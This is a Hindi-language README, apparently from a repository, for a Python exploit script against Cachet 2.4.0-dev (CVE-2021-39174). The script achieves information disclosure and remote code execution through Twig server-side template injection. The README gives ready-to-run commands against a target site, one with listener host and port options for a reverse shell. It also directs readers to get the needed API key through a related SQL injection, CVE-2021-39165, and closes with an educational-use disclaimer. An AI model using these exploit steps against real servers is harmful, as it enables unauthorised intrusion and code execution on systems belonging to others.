
CVE-2021-39174 Cachet 2.4.0-dev
CVE-2021-39174 Cachet 2.4.0-dev के लिए एक python3 स्क्रिप्ट जो Twig सर्वर साइड टेम्पलेट इंजेक्शन के माध्यम से सूचना प्रकटीकरण और RCE प्रदान करती है। RCE के लिए उपयोगकर्ता का API KEY आवश्यक है। नीचे दिए गए Leave Songs लिंक को देखें जो बताता है कि SQL इंजेक्शन CVE-2021-39165 के माध्यम से API KEY कैसे प्राप्त करें।
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password
python3 cachet_2.4.0-dev.py -t http://cachet.site/ -u username -p password -k API_KEY -lhost 127.0.0.1 -lport 1337
सहायता मेनू के लिए:
python3 cachet_2.4.0-dev.py -h
इस रिपॉजिटरी में प्रदान किया गया सभी कोड केवल शैक्षिक/अनुसंधान उद्देश्यों के लिए है। इस रिपॉजिटरी में निहित सामग्री से संबंधित कोई भी कार्य और/या गतिविधियाँ पूरी तरह से आपकी जिम्मेदारी हैं। इस रिपॉजिटरी में कोड का दुरुपयोग संबंधित व्यक्तियों के खिलाफ आपराधिक आरोप लगा सकता है। लेखक उन व्यक्तियों के खिलाफ लाए गए किसी भी आपराधिक आरोप की स्थिति में जिम्मेदार नहीं होगा जो कानून तोड़ने के लिए इस रिपॉजिटरी में कोड का दुरुपयोग करते हैं।